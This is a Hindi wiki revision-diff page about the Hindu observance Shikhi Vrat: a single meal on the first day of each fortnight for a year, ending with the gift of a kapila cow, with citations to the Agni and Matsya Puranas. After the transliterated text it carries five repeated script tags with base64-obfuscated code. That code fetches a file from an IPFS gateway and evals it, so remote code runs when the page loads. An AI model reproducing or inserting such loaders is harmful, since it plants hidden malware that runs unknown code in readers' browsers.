Difference between revisions of "शिखि व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (शिखिव्रत का नाम बदलकर शिखि व्रत कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*प्रत्येक [[मास]] की दोनों पक्षों की प्रथम तिथि पर एकभक्त की विधि करनी चाहिए।
 
*प्रत्येक [[मास]] की दोनों पक्षों की प्रथम तिथि पर एकभक्त की विधि करनी चाहिए।
 
*शिखिव्रत एक वर्ष तक करना चाहिए।
 
*शिखिव्रत एक वर्ष तक करना चाहिए।
 
*अन्त में कपिला [[गो दान]] करना चाहिए।
 
*अन्त में कपिला [[गो दान]] करना चाहिए।
*ऐसी मान्यता है कि शिखिव्रत से वैश्वानरलोक की प्राप्ति होती है।<ref>[[अग्नि पुराण]] (176|6-7); वर्षक्रियाकौमुदी (29, [[मत्स्य पुराण]] 101|92 से उद्धरण)</ref>
+
*ऐसी मान्यता है कि शिखिव्रत से वैश्वानरलोक की प्राप्ति होती है।<ref>[[अग्नि पुराण]] (176|6-7); वर्षक्रियाकौमुदी (29, [[मत्स्य पुराण]] 101|92 से उद्धरण</ref>
  
  
Line 9: Line 9:
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 13:01, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • pratyek mas ki donoan pakshoan ki pratham tithi par ekabhakt ki vidhi karani chahie.
  • shikhivrat ek varsh tak karana chahie.
  • ant mean kapila go dan karana chahie.
  • aisi manyata hai ki shikhivrat se vaishvanaralok ki prapti hoti hai.[1]



<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. agni puran (176|6-7); varshakriyakaumudi (29, matsy puran 101|92 se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>